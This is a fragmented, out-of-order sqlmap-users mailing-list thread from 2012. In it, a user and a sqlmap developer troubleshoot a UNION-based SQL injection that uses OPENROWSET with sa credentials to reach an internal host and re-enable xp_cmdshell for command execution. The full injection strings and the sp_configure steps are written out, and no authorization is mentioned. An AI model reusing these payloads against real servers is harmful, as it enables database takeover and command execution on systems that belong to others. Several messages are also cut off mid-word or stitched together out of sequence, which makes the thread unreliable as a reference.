Hi Adi.
I think that that is really the proper way to "escape" the single quote
in MsSQL
(http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver)
and you can't use any CHAR() escaping directly inside the OPENROWSET (there
are some ways to do it via EXEC
htt
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
select @@version; master..sp_configure ''xp_cmdshell'',1
')),'aaa','15','16','17','18','19','20','21' from teachers7 where
It all depends on context. You'll need to send a sample that you want to
run. Quotes are not interpreted/parsed everywhere the same.
Kind regards
On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu wrote:
> my feeling is that
> "[OLE/DB provider returned message: Deferred prepare could not be
> complete
my feeling is that
"[OLE/DB provider returned message: Deferred prepare could not be completed."
is because of an SQL error :) so my fault.
and regarding the second error, I think you must always return some columns in
the query, such as select @@version.
now question is how do i embed a strin
tried, same stuff.
I've tried to reenable xp_cmdshell first with
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
and got the same error: [OLE/DB provider returned message: Deferred prepare
could not be completed.]
then with 'exec
try with master..resultabcd
I forgot to mention that there need to be two dots (or a schema name in
between) between the db name and the table name in MSSQL
On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu wrote:
> Hi Miroslav,
>
> got db_name master and tried with master.resultabcd but I get the same
> erro
Hi Miroslav,
got db_name master and tried with master.resultabcd but I get the same error.
Kind Regards,
A.
From: Miroslav Stampar
To: Adi Mutu
Cc: "sqlmap-users@lists.sourceforge.net"
Sent: Thursday, June 21, 2012 11:11 AM
Subject: Re: [sqlmap-users] err
p.s. find the current database name and prepend to the resultbcd (e.g.
'SELECT output FROM currentdb.resultbcd')
p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via
that OPENROWSET
On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar <
miroslav.stam...@gmail.com
Hi Adi.
You could try prepending the database name to the resultbcd. It seems that
in case of linked server(s) doing that fixes the mentioned problem
(Reference:
http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
)
Kind
I'm having an injection like this:
openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
select * from
OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
output